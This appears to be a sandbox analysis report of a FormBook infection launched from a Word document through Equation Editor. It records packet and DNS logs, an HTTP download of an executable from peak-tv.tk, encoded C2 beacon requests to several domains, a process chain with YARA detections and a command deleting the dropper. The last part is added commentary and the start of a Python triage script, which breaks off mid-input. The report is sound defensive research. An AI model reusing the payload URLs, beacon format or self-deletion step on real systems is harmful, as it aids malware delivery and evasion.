Jan 13, 2022 18:17:00.211801052 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211810112 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211818933 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211827040 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211834908 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211843967 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211858988 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211862087 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211874008 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211888075 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211889982 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211891890 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211911917 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211913109 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211920977 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211966991 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.212903976 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238516092 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238545895 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238562107 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238579035 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238579035 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238596916 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238604069 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238615036 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238624096 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238631964 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238647938 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238648891 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238666058 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238667965 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238682985 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238688946 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238699913 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238715887 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238717079 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238734007 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238737106 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238750935 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238756895 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238768101 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238779068 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238785028 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238801003 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238801003 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238818884 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238820076 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238836050 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238842964 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238858938 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238859892 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238877058 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238879919 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238893032 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238899946 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238910913 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238919020 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238926888 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238941908 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.238943100 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.238960028 CET  80           49167      2.58.149.41   192.168.2.22

                                                                          UDP Packets

Timestamp                              Source Port  Dest Port  Source IP     Dest IP
Jan 13, 2022 18:17:00.061178923 CET    52167        53         192.168.2.22  8.8.8.8
Jan 13, 2022 18:17:00.109055042 CET    53           52167      8.8.8.8       192.168.2.22
Jan 13, 2022 18:18:34.665961027 CET    50591        53         192.168.2.22  8.8.8.8
Jan 13, 2022 18:18:34.698467016 CET    53           50591      8.8.8.8       192.168.2.22
Jan 13, 2022 18:18:53.462610960 CET    57805        53         192.168.2.22  8.8.8.8
Jan 13, 2022 18:18:53.484441042 CET    53           57805      8.8.8.8       192.168.2.22
Jan 13, 2022 18:18:58.635457993 CET    59030        53         192.168.2.22  8.8.8.8
Jan 13, 2022 18:18:58.766792059 CET    53           59030      8.8.8.8       192.168.2.22
Jan 13, 2022 18:19:03.935352087 CET    59185        53         192.168.2.22  8.8.8.8
Jan 13, 2022 18:19:03.973486900 CET    53           59185      8.8.8.8       192.168.2.22
Jan 13, 2022 18:19:09.561289072 CET    55616        53         192.168.2.22  8.8.8.8
Jan 13, 2022 18:19:09.586139917 CET    53           55616      8.8.8.8       192.168.2.22

                                                                          DNS Queries

Timestamp                              Source IP     Dest IP  Trans ID  OP Code             Name                          Type            Class
Jan 13, 2022 18:17:00.061178923 CET    192.168.2.22  8.8.8.8  0x65b0    Standard query (0)  peak-tv.tk                    A (IP address)  IN (0x0001)
Jan 13, 2022 18:18:34.665961027 CET    192.168.2.22  8.8.8.8  0xfc43    Standard query (0)  www.prestigiousuniforms.com   A (IP address)  IN (0x0001)
Jan 13, 2022 18:18:53.462610960 CET    192.168.2.22  8.8.8.8  0x9c63    Standard query (0)  www.muzicalbox.com            A (IP address)  IN (0x0001)
Jan 13, 2022 18:18:58.635457993 CET    192.168.2.22  8.8.8.8  0x30e0    Standard query (0)  www.extraordinarymiracle.com  A (IP address)  IN (0x0001)
Jan 13, 2022 18:19:03.935352087 CET    192.168.2.22  8.8.8.8  0x9037    Standard query (0)  www.realstakepool.com         A (IP address)  IN (0x0001)
Jan 13, 2022 18:19:09.561289072 CET    192.168.2.22  8.8.8.8  0xce43    Standard query (0)  www.danielkcarter.store       A (IP address)  IN (0x0001)

                                                                          DNS Answers

Timestamp                              Source IP  Dest IP       Trans ID  Reply Code    Name                          CName                 Address         Type                    Class
Jan 13, 2022 18:17:00.109055042 CET    8.8.8.8    192.168.2.22  0x65b0    No error (0)  peak-tv.tk                    -                     2.58.149.41     A (IP address)          IN (0x0001)
Jan 13, 2022 18:18:34.698467016 CET    8.8.8.8    192.168.2.22  0xfc43    No error (0)  www.prestigiousuniforms.com   shops.myshopify.com   -               CNAME (Canonical name)  IN (0x0001)
Jan 13, 2022 18:18:34.698467016 CET    8.8.8.8    192.168.2.22  0xfc43    No error (0)  shops.myshopify.com           -                     23.227.38.74    A (IP address)          IN (0x0001)
Jan 13, 2022 18:18:53.484441042 CET    8.8.8.8    192.168.2.22  0x9c63    No error (0)  www.muzicalbox.com            muzicalbox.com        -               CNAME (Canonical name)  IN (0x0001)
Jan 13, 2022 18:18:53.484441042 CET    8.8.8.8    192.168.2.22  0x9c63    No error (0)  muzicalbox.com                -                     34.102.136.180  A (IP address)          IN (0x0001)
Jan 13, 2022 18:18:58.766792059 CET    8.8.8.8    192.168.2.22  0x30e0    No error (0)  www.extraordinarymiracle.com  -                     109.94.209.123  A (IP address)          IN (0x0001)
Jan 13, 2022 18:19:03.973486900 CET    8.8.8.8    192.168.2.22  0x9037    No error (0)  www.realstakepool.com         -                     91.195.240.13   A (IP address)          IN (0x0001)
Jan 13, 2022 18:19:09.586139917 CET    8.8.8.8    192.168.2.22  0xce43    No error (0)  www.danielkcarter.store       -                     172.67.181.75   A (IP address)          IN (0x0001)
Jan 13, 2022 18:19:09.586139917 CET    8.8.8.8    192.168.2.22  0xce43    No error (0)  www.danielkcarter.store       -                     104.21.83.204   A (IP address)          IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • peak-tv.tk
                                                                          • www.prestigiousuniforms.com
                                                                          • www.muzicalbox.com
                                                                          • www.extraordinarymiracle.com
                                                                          • www.realstakepool.com

                                                                          HTTP Packets

Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
0           192.168.2.22  49167        2.58.149.41     80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp                              kBytes transferred  Direction  Data
Jan 13, 2022 18:17:00.157764912 CET    0                   OUT        GET /medicomzx.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: peak-tv.tk
                                                                          Connection: Keep-Alive
Jan 13, 2022 18:17:00.184818029 CET    2                   IN         HTTP/1.1 200 OK
                                                                          Date: Thu, 13 Jan 2022 17:17:00 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Tue, 11 Jan 2022 16:19:34 GMT
                                                                          ETag: "aca00-5d550d19904c2"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 707072
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/octet-stream
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELaP @ @O H.text `.rsrc@@.reloc@BH$`#("*&(#*s$s%s&s's(*0~o)+*0~o*+*0~o++*0~o,+*0~o-+*0<~(.,!rp(/o0s1~+*0~+*"*0&(r%p~o2(3t$+*Vs(4t*(5*0~+*0(+*01


Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
1           192.168.2.22  49168        23.227.38.74    80                C:\Windows\explorer.exe
Timestamp                              kBytes transferred  Direction  Data
Jan 13, 2022 18:18:34.728436947 CET    749                 OUT        GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.prestigiousuniforms.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 13, 2022 18:18:34.850775003 CET    750                 IN         HTTP/1.1 403 Forbidden
                                                                          Date: Thu, 13 Jan 2022 17:18:34 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          X-Sorting-Hat-PodId: 179
                                                                          X-Sorting-Hat-ShopId: 59690647732
                                                                          X-Dc: gcp-europe-west1
                                                                          X-Request-ID: e3e3ac4d-8382-4b00-a294-d0a023d81b81
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                          X-XSS-Protection: 1; mode=block
                                                                          X-Download-Options: noopen
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Server: cloudflare
                                                                          CF-RAY: 6cd048db19b64333-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
2           192.168.2.22  49170        34.102.136.180  80                C:\Windows\explorer.exe
Timestamp                              kBytes transferred  Direction  Data
Jan 13, 2022 18:18:53.504982948 CET    755                 OUT        GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.muzicalbox.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 13, 2022 18:18:53.620393038 CET    756                 IN         HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Thu, 13 Jan 2022 17:18:53 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6192576d-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
3           192.168.2.22  49171        109.94.209.123  80                C:\Windows\explorer.exe
Timestamp                              kBytes transferred  Direction  Data
Jan 13, 2022 18:18:58.849119902 CET    757                 OUT        GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.extraordinarymiracle.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 13, 2022 18:18:58.928126097 CET    757                 IN         HTTP/1.1 301 Moved Permanently
                                                                          Server: nginx/1.20.1
                                                                          Date: Thu, 13 Jan 2022 17:18:58 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 169
                                                                          Connection: close
                                                                          Location: https://www.extraordinarymiracle.com:443/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
4           192.168.2.22  49172        91.195.240.13   80                C:\Windows\explorer.exe
Timestamp                              kBytes transferred  Direction  Data
Jan 13, 2022 18:19:03.995932102 CET    758                 OUT        GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.realstakepool.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 13, 2022 18:19:04.058167934 CET    760                 IN         HTTP/1.1 200 OK
                                                                          Date: Thu, 13 Jan 2022 17:19:04 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2Mk9EhopbXMu42eavgK1yXE4PglsRvR8qjaVl2mNVBSizKR8WUmb1Wa+buflcm3md4clWQgYQYD4jU1VeTXlQg==
                                                                          Last-Modified: Thu, 13 Jan 2022 17:19:04 GMT
                                                                          X-Cache-Miss-From: parking-78bc4f798d-jmf9p
                                                                          Server: NginX
                                                                          Data Ascii: 5c51<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2Mk9EhopbXMu42eavgK1yXE4PglsRvR8qjaVl2mNVBSizKR8WUmb1Wa+buflcm3md4clWQgYQYD4jU1VeTXlQg==><head><meta charset="utf-8"><title>realstakepool.com&nbsp;-&nbsp;Questo sito web in vendita!&nbsp;-&nbsp;realstakepool Risorse e informazione.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="Questo sito web in vendita! realstakepool.com la prima e miglior fonte per tutte le informazioni ricercate. Da temi generali a


                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior

                                                                          System Behavior

                                                                          General

Start time: 18:16:16
Start date: 13/01/2022
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x13f140000
File size: 1423704 bytes
MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                          General

                                                                          Start time:18:16:18
                                                                          Start date:13/01/2022
                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                          Imagebase:0x400000
                                                                          File size:543304 bytes
                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:18:16:19
                                                                          Start date:13/01/2022
                                                                          Path:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Imagebase:0xad0000
                                                                          File size:707072 bytes
                                                                          MD5 hash:8807C2E0F2973A22812AF6E61BA72667
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 34%, Metadefender, Browse
                                                                          • Detection: 51%, ReversingLabs
                                                                          Reputation:low

                                                                          General

                                                                          Start time:18:16:24
                                                                          Start date:13/01/2022
                                                                          Path:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:{path}
                                                                          Imagebase:0xad0000
                                                                          File size:707072 bytes
                                                                          MD5 hash:8807C2E0F2973A22812AF6E61BA72667
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          General

                                                                          Start time:18:16:27
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0xffa10000
                                                                          File size:3229696 bytes
                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:high

                                                                          General

                                                                          Start time:18:16:40
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\SysWOW64\msdt.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                          Imagebase:0xc40000
                                                                          File size:983040 bytes
                                                                          MD5 hash:F67A64C46DE10425045AF682802F5BA6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:18:16:44
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
                                                                          Imagebase:0x4a2b0000
                                                                          File size:302592 bytes
                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
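
The process blocks above read, in order, as the whole FormBook delivery chain: Equation Editor (EQNEDT32.EXE, started with -Embedding) runs a dropped executable from %AppData%\Roaming, that executable starts a second copy of itself whose command line the report shows as the placeholder "{path}" (the hollowed instance, now reported as native code rather than .NET), FormBook then lives in explorer.exe and msdt.exe, and a final cmd.exe deletes the dropper. The following triage script is an added example and not part of the Joe Sandbox report or its tooling; it parses the "General" key:value blocks as laid out on this page and flags those three patterns. The parent-child relationships are assumed from list order and start times, because the blocks carry no parent PID, and the embedded input is a constructed cut-down copy of the four relevant blocks above.

```python
"""
Triage helper for the per-process "General" blocks of a Joe Sandbox report.
Added example, not part of the report. It parses the Key:Value blocks and
flags the delivery chain visible on this page:
  1. EQNEDT32.EXE present and a later process running from a user-writable
     directory (Equation Editor exploit dropping and launching a binary).
  2. The same binary listed twice with identical MD5 and imagebase, where a
     later instance has the sandbox placeholder commandline "{path}"
     (self-hollowing of the dropper).
  3. cmd.exe "/c del" aimed at a path some earlier process ran from
     (self-deletion of the dropper).
Parentage is assumed from list order; the report has no parent PIDs.
"""
import re
from collections import defaultdict

# Constructed input: a cut-down copy of four process blocks from the report.
REPORT = """\
General
Start time:18:16:18
Path:C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE
Commandline:"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" -Embedding
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Imagebase:0x400000

General
Start time:18:16:19
Path:C:\\Users\\user\\AppData\\Roaming\\medicomsh78694.exe
Commandline:C:\\Users\\user\\AppData\\Roaming\\medicomsh78694.exe
MD5 hash:8807C2E0F2973A22812AF6E61BA72667
Imagebase:0xad0000

General
Start time:18:16:24
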